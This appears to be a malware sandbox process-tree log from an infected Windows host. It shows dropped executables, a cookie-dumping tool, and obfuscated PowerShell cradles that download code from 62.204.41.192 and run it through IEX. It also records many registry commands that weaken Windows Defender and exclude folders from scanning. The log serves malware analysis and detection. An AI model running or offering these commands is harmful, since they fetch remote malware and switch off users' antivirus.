"C:\Windows\System32\cmd.exe" /c taskkill /im "9AMxt77ZfihiU4VeKdxGSyym.exe" /f & erase "C:\Users\Admin\Documents\9AMxt77ZfihiU4VeKdxGSyym.exe" & exit
7⤵
PID:3264

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "9AMxt77ZfihiU4VeKdxGSyym.exe" /f
8⤵
- Kills process with taskkill
PID:3756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 1436
7⤵
- Program crash
PID:4896

C:\Users\Admin\Documents\lT7Ktq7RZVK5NGevobiXldEi.exe
"C:\Users\Admin\Documents\lT7Ktq7RZVK5NGevobiXldEi.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3276

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_4.exe
arnatic_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3684

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:3008

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2184

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_3.exe
arnatic_3.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
6⤵
- Loads dropped DLL
PID:3264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 600
7⤵
- Program crash
PID:3412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_2.exe
arnatic_2.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2596

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\arnatic_1.exe
arnatic_1.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1536
6⤵
- Program crash
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3264 -ip 3264
1⤵
PID:3540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1852 -ip 1852
1⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1636 -ip 1636
1⤵
PID:2756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3248 -ip 3248
1⤵
PID:4340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 480 -ip 480
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1636 -ip 1636
1⤵
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4044 -ip 4044
1⤵
PID:4896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2436 -ip 2436
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 644
1⤵
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 432
1⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4464

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:1876

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:2468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2468 -s 300
3⤵
- Program crash
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 480 -ip 480
1⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4044 -ip 4044
1⤵
PID:4324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 624
1⤵
- Program crash
PID:4316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
1⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
2⤵
PID:2756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 3248 -ip 3248
1⤵
PID:4128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 476
1⤵
- Program crash
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2436 -ip 2436
1⤵
PID:4180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1636 -ip 1636
1⤵
PID:4864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 672
1⤵
- Program crash
PID:2996

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
1⤵
PID:5020

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
2⤵
- Kills process with taskkill
PID:3104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1636 -ip 1636
1⤵
PID:4264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1636 -ip 1636
1⤵
PID:4636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1636 -ip 1636
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1636 -ip 1636
1⤵
PID:396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1636 -ip 1636
1⤵
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1636 -ip 1636
1⤵
PID:1404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1720

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:4068

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2468 -ip 2468
1⤵
PID:2580

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
1⤵
PID:2188

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:564

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\YAnxQmd.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\YAnxQmd.exe j6 /site_id 525403 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:796

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4444

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1224

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:4760

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:5116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4244

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:4204

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:4632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4968

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:4972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:4680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3808

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2936

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2972

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4492

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:5020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:2908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1324

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3760

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4164

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3772

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4368

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4540

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:424

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3272

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:3444

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
3⤵
PID:3848

C:\Windows\SysWOW64\reg.exe
